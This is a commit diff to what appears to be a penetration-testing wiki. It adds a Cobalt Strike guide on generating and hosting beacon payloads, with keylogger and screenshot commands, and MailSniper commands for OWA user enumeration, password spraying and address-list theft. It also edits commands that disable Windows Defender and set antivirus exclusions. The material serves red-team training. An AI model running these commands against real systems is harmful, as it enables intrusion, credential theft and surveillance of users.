GitBook: [#3365] No subject

SUMMARY.md

@@ -639,6 +639,7 @@
 * [Empire](backdoors/empire.md)
 * [Salseo](backdoors/salseo.md)
 * [ICMPsh](backdoors/icmpsh.md)
+* [Cobalt Strike](c2/cobalt-strike.md)
 
 ## ✍ TODO
 

c2/cobalt-strike.md

@@ -0,0 +1,42 @@
+# Cobalt Strike
+
+### Listeners
+
+Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more
+
+### Generate & Host payloads
+
+#### Generate payloads in files
+
+Attacks -> Packages -> 
+
+* **`HTMLApplication`** for HTA files
+* **`MS Office Macro`** for an office document with a macro
+* **`Windows Executable`** for a .exe, .dll orr service .exe
+* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs)
+
+#### Generate & Host payloads
+
+A`ttacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
+
+#### Host Payloads
+
+If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config.
+
+### Beacon Options
+
+```bash
+# Execute local .NET binary
+execute-assembly </path/to/executable.exe>
+
+
+# Screenshots
+printscreen    # Take a single screenshot via PrintScr method
+screenshot     # Take a single screenshot
+screenwatch    # Take periodic screenshots of desktop
+## Go to View -> Screenshots to see them
+
+# keylogger
+keylogger [pid] [x86|x64]
+## View > Keystrokes to see the keys pressed
+```

windows-hardening/active-directory-methodology/README.md

@@ -91,6 +91,28 @@ msf> use auxiliary/gather/kerberos_enumusers
 crackmapexec smb dominio.es  -u '' -p '' --users | awk '{print $4}' | uniq
 ```
 
+{% hint style="warning" %}
+You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names).
+
+However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) **** to generate potential valid usernames.
+{% endhint %}
+
+#### **OWA (Outlook Web Access) Server**
+
+If you found one of these servers in the network you can also perform **user enumeration against it**. For example, you could use the tool [**MailSniper**](https://github.com/dafthack/MailSniper):
+
+```bash
+ipmo C:\Tools\MailSniper\MailSniper.ps1
+# Get info about the domain
+Invoke-DomainHarvestOWA -ExchHostname [ip]
+# Enumerate valid users from a list of potential usernames
+Invoke-UsernameHarvestOWA -ExchHostname [ip] -Domain [domain] -UserList .\possible-usernames.txt -OutFile valid.txt
+# Password spraying
+Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summer2021
+# Get addresses list from the compromised mail
+Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt
+```
+
 ### Knowing one or several usernames
 
 Ok, so you know you have already a valid username but no passwords... Then try:

windows-hardening/basic-powershell-for-pentesters/README.md

@@ -176,16 +176,14 @@ Get-NetConnectionProfile |
   }
 ```
 
-## Disable Defender
+## Antivirus
 
 ```bash
-# Check status
+#Check status
 Get-MpComputerStatus
-# Disable
+#Disable
 Set-MpPreference -DisableRealtimeMonitoring $true
-#To completely disable Windows Defender on a computer, use the command:
+#Set exclusion path
-New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
-# Set exclusion path
 Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
 ```